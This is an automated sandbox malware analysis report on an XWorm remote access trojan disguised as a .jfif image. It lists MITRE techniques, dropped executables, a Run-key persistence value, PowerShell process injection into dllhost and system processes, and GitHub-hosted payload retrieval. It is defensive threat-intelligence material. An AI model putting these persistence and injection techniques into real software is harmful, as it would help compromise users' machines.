Malware Analysis Report

2024-09-11 13:54

Sample ID 240615-labnwsvglb
Target download (1).jfif
SHA256 de395b853803c92eba20833640fab2d399d7c305666c49944d08c148a97779d9
Tags
xworm persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

de395b853803c92eba20833640fab2d399d7c305666c49944d08c148a97779d9

Threat Level: Known bad

The file download (1).jfif was found to be: Known bad.

Malicious Activity Summary

xworm persistence rat trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-15 09:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:22

Platform

win10-20240404-en

Max time kernel

150s

Max time network

153s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2424 created 584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\svchost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\x4s.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe" C:\Users\Admin\AppData\Local\Temp\x4s.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2424 set thread context of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\svchost32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 15 Jun 2024 09:21:03 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718443262" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svchost32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\x4s.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4868 wrote to memory of 4180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4868 wrote to memory of 4180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4180 wrote to memory of 824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\svchost32.exe
PID 4180 wrote to memory of 824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\svchost32.exe
PID 824 wrote to memory of 1020 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4s.exe
PID 824 wrote to memory of 1020 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4s.exe
PID 824 wrote to memory of 5064 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
PID 824 wrote to memory of 5064 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
PID 824 wrote to memory of 5064 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2424 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1144 wrote to memory of 584 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1144 wrote to memory of 640 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1144 wrote to memory of 736 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 908 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1008 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 1144 wrote to memory of 64 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 696 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 808 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1036 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1092 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1192 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1228 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1240 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1248 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1388 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1456 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1464 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1548 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1560 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1596 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1688 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1144 wrote to memory of 1744 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1788 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1144 wrote to memory of 1800 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1144 wrote to memory of 1876 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1888 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1968 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 1144 wrote to memory of 1344 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2140 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2352 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2360 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
